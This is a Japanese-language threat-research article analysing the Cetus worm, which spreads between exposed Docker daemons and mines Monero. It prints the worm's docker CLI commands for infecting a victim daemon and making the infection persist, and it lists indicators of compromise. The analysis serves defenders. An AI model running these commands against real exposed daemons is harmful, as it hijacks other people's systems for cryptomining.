[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/cetus-cryptojacking-worm/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [クラウド サイバーセキュリティ リサーチ](https://unit42.paloaltonetworks.com/ja/category/cloud-cybersecurity-research-ja/ "クラウド サイバーセキュリティ リサーチ")  
  [クラウド サイバーセキュリティ リサーチ](https://unit42.paloaltonetworks.com/ja/category/cloud-cybersecurity-research-ja/)

# Cetus: Dockerデーモンを標的にするクリプトジャックワーム

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 2 分で読めます  
Related Products  
[![Prisma Cloud icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/prisma_RGB_logo_Icon_Color.png)Prisma Cloud](https://unit42.paloaltonetworks.com/ja/product-category/prisma-cloud-ja/ "Prisma Cloud")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Aviv Sasson](https://unit42.paloaltonetworks.com/ja/author/aviv-sasson/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2020年8月27日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [クラウド サイバーセキュリティ リサーチ](https://unit42.paloaltonetworks.com/ja/category/cloud-cybersecurity-research-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Cetus](https://unit42.paloaltonetworks.com/ja/tag/cetus-ja/)
  * [Cryptocurrency](https://unit42.paloaltonetworks.com/ja/tag/cryptocurrency-ja/)
  * [Cryptojacking](https://unit42.paloaltonetworks.com/ja/tag/cryptojacking-ja/)
  * [Docker](https://unit42.paloaltonetworks.com/ja/tag/docker-ja/)
  * [Docker Daemon](https://unit42.paloaltonetworks.com/ja/tag/docker-daemon-ja/)
  * [Docker vulnerability](https://unit42.paloaltonetworks.com/ja/tag/docker-vulnerability-ja/)
  * [Worm](https://unit42.paloaltonetworks.com/ja/tag/worm-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/cetus-cryptojacking-worm/?pdf=download&lg=ja&_wpnonce=5f0cc26d8b "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/cetus-cryptojacking-worm/?pdf=print&lg=ja&_wpnonce=5f0cc26d8b "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Cetus:%20Dockerデーモンを標的にするクリプトジャックワーム&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcetus-cryptojacking-worm%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcetus-cryptojacking-worm%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcetus-cryptojacking-worm%2F&title=Cetus:%20Dockerデーモンを標的にするクリプトジャックワーム "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcetus-cryptojacking-worm%2F&text=Cetus:%20Dockerデーモンを標的にするクリプトジャックワーム "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcetus-cryptojacking-worm%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Cetus:%20Dockerデーモンを標的にするクリプトジャックワーム%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fcetus-cryptojacking-worm%2F "Share in Mastodon")

## 概要

セキュリティ専門家はコンテナ技術黎明期からセキュアでないDockerデーモンを大きな脅威と捉えてきました。パロアルトネットワークス脅威インテリジェンス調査チーム Unit 42でもこれまでに、こうしたコンテナの脅威について「[Docker Engineのコンテナで拡散する初めてのクリプトジャック（仮想通貨採掘）ワーム](https://unit42.paloaltonetworks.jp/graboid-first-ever-cryptojacking-worm-found-in-images-on-docker-hub/)」、「[セキュアでないDockerデーモンへの攻撃者の戦術とテクニックが明らかに 地理的分布で日本は全体の3.7%](https://unit42.paloaltonetworks.jp/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/)」という2本の記事を公開しています。これにつづいて筆者たちはDockerデーモンのハニーポットを設置した調査を行いました。その目的は、「インターネット上に公開されている平均的Dockerデーモンをとりまく状況がどのようなものか」、「COVID-19に起因するクラウドへの移行が果たして標的型クラウド攻撃の質や量の向上につながったのかどうか」を確認することにありました。

本稿では筆者らが仕掛けたDockerデーモンのハニーポットで発見された「Cetus」というMoneroマイニング用の改良型Dockerクリプトジャックワームについて解説していきます。

パロアルトネットワークスの[Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)をご利用のお客様は、[Prisma Cloud Compute](https://www.paloaltonetworks.com/resources/datasheets/prisma-cloud-compute-edition)のホストコンプライアンス保護機能を通じて不備のあるDockerデーモン構成の警告・解決策を受け取ることでこの脅威から保護されています。

## ハニーポット

本調査の実施にあたり、筆者は分離された制限付きDockerデーモンを設置し、5月のまる一ヶ月のトラフィックをすべてログに記録しました。その間、ボットネットからワームまであらゆるものを配信するさまざまな攻撃を目撃しました。それらの大部分がMonero用クリプトジャッキングを目的としたものでしたが、なかでもとりわけ頻繁に見られた攻撃の1つが筆者らの注意を引きました。そこにはワームを思わせるパターンがあったからです。このワームの場合、他の攻撃とは違って、ハニーポットがセキュアでないさまざまなDockerデーモンインスタンスから攻撃を受けていました。これまでのハニーポット設置時の経験やコンテナセキュリティ関連の研究プロジェクト類に照らしても、セキュアでないDockerデーモンを標的としたワームを目にするのはさほど一般的とはいえません。そこで筆者はこのペイロードを分析し、結果的にこれが新種のDockerワームであるものと判断しました。このマルウェアの各インスタンスはローカルネットワーク内外のDockerデーモンインスタンスを検出して感染しようとします。

## Cetusの仕組み

ギリシャ神話にクジラに似たある生き物についての物語があります。この生き物は一見無害そうでいて実はどこへ出没しても大混乱を引き起こす海の怪物です。この生き物の名前をCetus（ケートス）といいます。

今回見つかったマルウェアは、クジラのロゴを使うDockerデーモンを狙っていて、一見なんでもないような正当なバイナリに偽装しようとしています。ここから筆者はこのマルウェアをCetusと名付けることにしました。

CetusはPortainerと呼ばれるDocker環境でよく利用される正当なバイナリを模倣することでその正体を偽装します。[Portainer](https://github.com/portainer/portainer)はユーザーインターフェイス（UI）管理ツールで、これを使うと複数のDocker環境を効率よく管理することができます。新しいマシンを引き継ぐさい、Cetusはそのマシンに自分自身をコピーして[XMRig](https://github.com/xmrig/xmrig)クリプトマイナーのペイロードをデプロイします。Cetusは、このときクリプトマイナーをdocker-cacheというべつの正当そうな名前のバイナリに偽装しますが、こちらはPortainerとちがって実際の正当なバイナリ名ではありません。
![The Cetus life cycle starts with two functions: miner\_start and scan\_start, which follow the flow illustrated here. The final step is to cause the victim to create an Ubuntu container, update repositories, install Masscan and Docker, copy Cetus and XMRig, add persistence through .bash\_aliases, and then restart the container and run Cetus.](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/08/word-image-30.png) 図 1 Cetusのライフサイクル

感染の仕組みは単純かつ巧妙です。Cetusは[Masscan](https://github.com/robertdavidgraham/masscan)を使ってサブネット内にDockerデーモンがないかランダムにスキャンします。Dockerデーモンが見つかると当該デーモンのREST APIにリクエストを送って感染を広げようとします。Cetusはご丁寧にもこれらのリクエストをDockerのコマンドラインインタフェース（CLI）ツールを使ってこしらえています。このときのCetusの攻撃フローを図1に示します。Cetusが実行するコマンドは具体的に次のとおりです。

* デーモンがエクスプロイト可能でまだ感染していないことを確認します。

Shell  
docker -H \<victim\> ps -a

|---|----------------------------|
| 1 | docker -H \<victim\> ps -a |

* Docker Hubからubuntu:18.04の新しいコンテナを実行します。

Shell  
docker -H \<victim\> run -dt --name \<name\> --restart always ubuntu:18.04 /bin/bash

|---|--------------------------------------------------------------------------------------|
| 1 | docker -H \<victim\> run -dt --name \<name\> --restart always ubuntu:18.04 /bin/bash |

* パッケージマネージャリストを更新します。

Shell  
docker -H \<victim\> exec \<name\> apt-get -yq update

|---|-------------------------------------------------------|
| 1 | docker -H \<victim\> exec \<name\> apt-get -yq update |

* MasscanとDockerをパッケージマネージャ経由でインストールします。

Shell  
docker -H \<victim\> exec \<name\> apt-get install masscan docker.io

|---|----------------------------------------------------------------------|
| 1 | docker -H \<victim\> exec \<name\> apt-get install masscan docker.io |

* 悪意のあるportainerとdocker-cacheバイナリをコンテナにコピーします。

Shell  
docker -H \<victim\> cp -L docker-cache \<name\>:/usr/bin/ docker -H \<victim\> cp -L portainer \<name\>/usr/bin/

|-----|-------------------------------------------------------------------------------------------------------------------|
| 1 2 | docker -H \<victim\> cp -L docker-cache \<name\>:/usr/bin/ docker -H \<victim\> cp -L portainer \<name\>/usr/bin/ |

* Cetusを/root/.bash\_aliasesに追加します。これでコンテナが再起動するかrootがbashセッションを開始するつどCetusが実行されるようになります。

Shell  
docker -H \<victim\> exec \<name\> bash --norc -c \`echo /usr/bin/portainer \<name\> \>/dev/null\` 2\>/dev/null \&

|---|--------------------------------------------------------------------------------------------------------------------|
| 1 | docker -H \<victim\> exec \<name\> bash --norc -c \`echo /usr/bin/portainer \<name\> \>/dev/null\` 2\>/dev/null \& |

* コンテナを再起動してCetusを実行します。

Shell  
docker -H \<victim\> restart \<name\>

|---|---------------------------------------|
| 1 | docker -H \<victim\> restart \<name\> |

### Cetusのリバースエンジニアリング

Cetusのリバースエンジニアリングは手っ取り早く簡単にできます。デバッグ対策や難読化などの手法は使用されておらず、シンボルまで含まれています。

ただしクリプトマイナー側はそうはいきません。XMRigマイナーはクリプトジャック攻撃に最もよく使用されるクリプトマイナーの1つなので、セキュリティ対策ツールにはウイルスとして扱われます。したがって、セキュリティ対策ツールを出し抜いて攻撃を行うためにXMRigマイナーは高度に難読化されており、リバースエンジニアリング処理も難しくなっています。

さらにこの2月にリリースされたXMRig 5.5.3を使用している点から、本マルウェアが新しいものであると結論付けることができます。 Cetusのアーキテクチャは単純で、miner\_start、scan\_startという2つの関数が含まれています。
!["The code pictured here reads as follows: miner\_start(); while ( 1 ) { random = rand(); and other lines not reproduced in plaintext here. This code starts Cetus's two main functions."](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/08/word-image-31.png) 図 2 Cetusの主な関数

miner\_start関数の機能は明快です。/var/log/stmp.logを開き、Cetusのアクションをログに記録し、XMRigクリプトマイナーを実行し、マシンのCPUを使ってMoneroをマイニングします。scan\_start関数はそれよりずっと興味深く、コアとなるマルウェアの機能を実行しています。ランダムな16ビットサブネットを選び、Masscanを実行してサブネット内をスキャンし、ポート2375でリッスンしているDockerデーモンを探します。デーモンが見つかるとダウンロード済みDocker CLIツールで感染プロセスを開始します。このマルウェアが興味深いのは、Dockerデーモンに感染するたびにコンテナを別の名前で呼び出す点です。本マルウェアは8つずつ名前が記されたリストを2つ持っており、各リストから1つずつ名前をランダムに名前をピックアップして、その2つの名前をつなげて使っています。
![This figure contains examples of the names used by Cetus, including boorish\_peristeronic, verdant\_quire and limpid\_oxter.](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/08/word-image-32.png) 図 3 悪意のあるコンテナ名

次にCetusはこの名前を引数としてマイナーを実行します。マイナーは自分自身をこの名前で識別して[マイニングプール](https://en.wikipedia.org/wiki/Mining_pool)に参加し、マイニング関連のアクター情報を送信します。これによって攻撃者は各マイナーを分類し、マイニングプールAPI経由でマイナーや攻撃キャンペーンの統計情報を生成することができます。こうした統計やログの仕組みをもたせている点から、本マルウェアのオペレーターはすべてを注意深く監視したがっているものと結論づけることができます。

## 結論

コンテナを標的とするマルウェアはその秘めた可能性への理解が攻撃者間で進むにつれ複雑化しています。本稿はGraboidに引き続きUnit 42で文書化された2本目のDocker用クリプトジャックワーム解説記事です。

なお筆者らは、Cetusを[別のクリプトジャックワーム](https://www.zdnet.com/article/crypto-mining-worm-steal-aws-credentials/)とリンクすることにも成功しました。こちらのクリプトジャックワームはAWSとDockerデーモンを攻撃するもので、Cetusと同じMoneroウォレットアドレスを使用していました。

クラウドに対する攻撃はますます巧妙化してきているというのが今回の調査での筆者らの結論です。

なお、パロアルトネットワークスの[Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)をご利用のお客様は、Prisma Cloud Computeのホストコンプライアンス保護機能を通じて不備のあるDockerデーモン構成の警告・解決策を受け取ることでこの脅威から保護されています。
![This shows an example of a Prisma Cloud host alert, warning of an insufficient Docker daemon configuration – an issue that could make a Docker daemon vulnerable to Cetus.](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/08/word-image-33.png) 図 4 Prisma Cloudのホストアラート

#### **IoC**

###### **ファイル**

|--------------|------------------------------------------------------------------|
| ファイル名        | SHA256値                                                          |
| docker-cache | e03cf2af46ad1fe590e63f0020243c6e8ae94f074e65ace18c6d568283343dac |
| portainer    | b49a3f3cb4c70014e2c35c880d47bc475584b87b7dfcfa6d7341d42a16ebe443 |

*表 1 マルウェアのハッシュ値*

#### **マイニングに関する情報**

###### **マイニング プール**

pool.minexmr.com:443

###### **支払い先アドレス**

85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN71CmNLoh

###### **コンテナ名**

1. 1. baleful\_gormmet
   2. baleful\_obelus
   3. baleful\_agelast
   4. baleful\_amatorculist
   5. baleful\_peristeronic
   6. baleful\_hirquiticke
   7. baleful\_oxter
   8. baleful\_quire
   9. boorish\_gormmet
   10. boorish\_obelus
   11. boorish\_agelast
   12. boorish\_amatorculist
   13. boorish\_peristeronic
   14. boorish\_hirquiticke
   15. boorish\_oxter
   16. boorish\_quire
   17. adroit\_gormmet
   18. adroit\_obelus
   19. adroit\_agelast
   20. adroit\_amatorculist
   21. adroit\_peristeronic
   22. adroit\_hirquiticke
   23. adroit\_oxter
   24. adroit\_quire
   25. fecund\_gormmet
   26. fecund\_obelus
   27. fecund\_agelast
   28. fecund\_amatorculist
   29. fecund\_peristeronic
   30. fecund\_hirquiticke
   31. fecund\_oxter
   32. fecund\_quire
   33. limpid\_gormmet
   34. limpid\_obelus
   35. limpid\_agelast
   36. limpid\_amatorculist
   37. limpid\_peristeronic
   38. limpid\_hirquiticke
   39. limpid\_oxter
   40. limpid\_quire
   41. risible\_gormmet
   42. risible\_obelus
   43. risible\_agelast
   44. risible\_amatorculist
   45. risible\_peristeronic
   46. risible\_hirquiticke
   47. risible\_oxter
   48. risible\_quire
   49. verdant\_gormmet
   50. verdant\_obelus
   51. verdant\_agelast
   52. verdant\_amatorculist
   53. verdant\_peristeronic
   54. verdant\_hirquiticke
   55. verdant\_oxter
   56. verdant\_quire
   57. zealous\_gormmet
   58. zealous\_obelus
   59. zealous\_agelast
   60. zealous\_amatorculist
   61. zealous\_peristeronic
   62. zealous\_hirquiticke
   63. zealous\_oxter
   64. zealous\_quire
       トップに戻る

### タグ

* [Cetus](https://unit42.paloaltonetworks.com/ja/tag/cetus-ja/ "cetus")
* [Cryptocurrency](https://unit42.paloaltonetworks.com/ja/tag/cryptocurrency-ja/ "Cryptocurrency")
* [Cryptojacking](https://unit42.paloaltonetworks.com/ja/tag/cryptojacking-ja/ "cryptojacking")
* [Docker](https://unit42.paloaltonetworks.com/ja/tag/docker-ja/ "Docker")
* [Docker Daemon](https://unit42.paloaltonetworks.com/ja/tag/docker-daemon-ja/ "Docker Daemon")
* [Docker vulnerability](https://unit42.paloaltonetworks.com/ja/tag/docker-vulnerability-ja/ "Docker vulnerability")
* [Worm](https://unit42.paloaltonetworks.com/ja/tag/worm-ja/ "Worm")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:エクスプロイトの開発状況: 80％のエクスプロイトはCVEより先に公開されている](https://unit42.paloaltonetworks.com/ja/state-of-exploit-development/ "エクスプロイトの開発状況: 80％のエクスプロイトはCVEより先に公開されている")

### 目次

* 

### 関連記事

* [01flip:Rustで書かれたマルチプラットフォーム ランサムウェア](https://unit42.paloaltonetworks.com/ja/new-ransomware-01flip-written-in-rust/ "article - table of contents")
* [コーディングに挑戦する開発者を狙うSlow Pisces、カスタマイズされたPythonマルウェアを新たに導入](https://unit42.paloaltonetworks.com/ja/slow-pisces-new-custom-malware/ "article - table of contents")
* [コンテナー エスケープ: クラウド環境でコンテナーから脱出する技術](https://unit42.paloaltonetworks.com/ja/container-escape-techniques/ "article - table of contents")

## 関連項目 リソース

![Pictorial representation of autonomous AI attack in cloud environments.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/12_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年4月23日 [#### AIはクラウドを攻撃できるのか?自律型クラウド攻撃型マルチエージェント システムの構築から得られた教訓](https://unit42.paloaltonetworks.com/ja/autonomous-ai-cloud-attacks/)

* [AI](https://unit42.paloaltonetworks.com/ja/tag/ai-ja/ "AI")

* [Cloud](https://unit42.paloaltonetworks.com/ja/tag/cloud-ja/ "Cloud")

* [Data exfiltration](https://unit42.paloaltonetworks.com/ja/tag/data-exfiltration-ja/ "data exfiltration")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/autonomous-ai-cloud-attacks/ "AIはクラウドを攻撃できるのか?自律型クラウド攻撃型マルチエージェント システムの構築から得られた教訓")  
  ![Close-up of a black woman with glasses examining colorful computer code on a screen. The scene is illuminated by various lights, creating a focused and analytical atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/13_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年2月6日 [#### クラウド脅威アクターの活動を検出する新しい手法](https://unit42.paloaltonetworks.com/ja/tracking-threat-groups-through-cloud-logging/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [IAM](https://unit42.paloaltonetworks.com/ja/tag/iam-ja/ "IAM")

* [MITRE](https://unit42.paloaltonetworks.com/ja/tag/mitre-ja/ "MITRE")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-threat-groups-through-cloud-logging/ "クラウド脅威アクターの活動を検出する新しい手法")  
  ![Pictorial representation of Azure OpenAI DNS resolution issue. Futuristic cityscape illustration with luminous structures and floating cloud elements, showcasing advanced technology and a dynamic, digitally enhanced environment.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/06/02_DNS_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月20日 [#### DNS OverDoS: プライベート エンドポイントはプライベートすぎるのか？](https://unit42.paloaltonetworks.com/ja/dos-attacks-and-azure-private-endpoint/)

* [Microsoft Azure](https://unit42.paloaltonetworks.com/ja/tag/microsoft-azure-ja/ "Microsoft Azure")

* [Networking](https://unit42.paloaltonetworks.com/ja/tag/networking/ "networking")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/dos-attacks-and-azure-private-endpoint/ "DNS OverDoS: プライベート エンドポイントはプライベートすぎるのか？")  
  ![Pictorial representation of cloud discovery with AzureHound. A digital representation of a cloud composed of blue light particles, superimposed over a blurred background of server racks in a data center.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/10/08_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年10月24日 [#### AzureHoundを使用したクラウド ディスカバリ](https://unit42.paloaltonetworks.com/ja/threat-actor-misuse-of-azurehound/)

* [Control plane](https://unit42.paloaltonetworks.com/ja/tag/control-plane-ja/ "control plane")

* [Curious Serpens](https://unit42.paloaltonetworks.com/ja/tag/curious-serpens-ja/ "Curious Serpens")

* [Data plane](https://unit42.paloaltonetworks.com/ja/tag/data-plane-ja/ "data plane")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/threat-actor-misuse-of-azurehound/ "AzureHoundを使用したクラウド ディスカバリ")  
  ![Pictorial representation of a gift card fraud campaign. A glowing skull and crossbones on a circuit board.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/10/07_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年10月22日 [#### Jingle Thief: クラウドベースのギフトカード詐欺キャンペーンの実態](https://unit42.paloaltonetworks.com/ja/cloud-based-gift-card-fraud-campaign/)

* [CL‑CRI‑1032](https://unit42.paloaltonetworks.com/ja/tag/cl-cri-1032-ja/ "CL‑CRI‑1032")

* [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/ "Microsoft")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cloud-based-gift-card-fraud-campaign/ "Jingle Thief: クラウドベースのギフトカード詐欺キャンペーンの実態")  
  ![Pictorial representation of model namespace reuse. A vibrant digital illustration featuring a glowing cloud icon with a padlock, symbolizing cloud security technology, set against a backdrop of glowing circuit lines in blue and orange.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/05_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年9月3日 [#### モデル名前空間の再利用テクニック: AIサプライチェーンの基本的側面を誤用する](https://unit42.paloaltonetworks.com/ja/model-namespace-reuse/)

* [Azure](https://unit42.paloaltonetworks.com/ja/tag/azure-ja/ "Azure")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/model-namespace-reuse/ "モデル名前空間の再利用テクニック: AIサプライチェーンの基本的側面を誤用する")  
  ![Pictorial representation of serverless tokens in the cloud. East Asian woman examining data on multiple screens in a high-tech environment, surrounded by digital graphics and code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/06/07_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年6月13日 [#### クラウドにおけるサーバーレス トークン: エクスプロイト攻撃と検出](https://unit42.paloaltonetworks.com/ja/serverless-authentication-cloud/)

* [AWS](https://unit42.paloaltonetworks.com/ja/tag/aws-ja/ "AWS")

* [Google Cloud](https://unit42.paloaltonetworks.com/ja/tag/google-cloud-ja/ "Google Cloud")

* [Microsoft Azure](https://unit42.paloaltonetworks.com/ja/tag/microsoft-azure-ja/ "Microsoft Azure")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/serverless-authentication-cloud/ "クラウドにおけるサーバーレス トークン: エクスプロイト攻撃と検出")  
  ![Pictorial representation of ELF-based malware like NoodleRAT, Winnti, SSHdInjector, Pygmy Goat and AcidPour. Vibrant futuristic cityscape with glowing neon lines, clouds, and a dramatic sky at twilight.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/06/02_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年6月10日 [#### クラウド運用におけるLinuxバイナリの進化](https://unit42.paloaltonetworks.com/ja/elf-based-malware-targets-cloud/)

* [Endpoint](https://unit42.paloaltonetworks.com/ja/tag/endpoint-ja/ "endpoint")

* [Linux Malware](https://unit42.paloaltonetworks.com/ja/tag/linux-malware-ja/ "Linux Malware")

* [Machine Learning](https://unit42.paloaltonetworks.com/ja/tag/machine-learning-ja/ "Machine Learning")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/elf-based-malware-targets-cloud/ "クラウド運用におけるLinuxバイナリの進化")  
  ![Pictorial representation of AWS Roles Anywhere. Futuristic cityscape with glowing orange and blue structures, elevated clouds, and illuminated, scattered points representing lights or data points.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/06/01_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年6月9日 [#### AWS IAM Roles Anywhereの危険性に迫る。](https://unit42.paloaltonetworks.com/ja/aws-roles-anywhere/)

* [AWS](https://unit42.paloaltonetworks.com/ja/tag/aws-ja/ "AWS")

* [Kubernetes](https://unit42.paloaltonetworks.com/ja/tag/kubernetes-ja/ "Kubernetes")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/aws-roles-anywhere/ "AWS IAM Roles Anywhereの危険性に迫る。")  
  ![Digital illustration of a glowing blue brain floating above a network of interconnected golden lines and points, symbolizing neural connections and artificial intelligence on a dark background with blue highlights.](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/12_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2025年5月21日 [#### GitHub Actionsサプライチェーン攻撃: Coinbaseへの標的型攻撃が拡大し、tj-actions/changed-files事件が多発: 脅威評価（4/2更新）](https://unit42.paloaltonetworks.com/ja/github-actions-supply-chain-attack/)

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Supply chain](https://unit42.paloaltonetworks.com/ja/tag/supply-chain-ja/ "supply chain")  
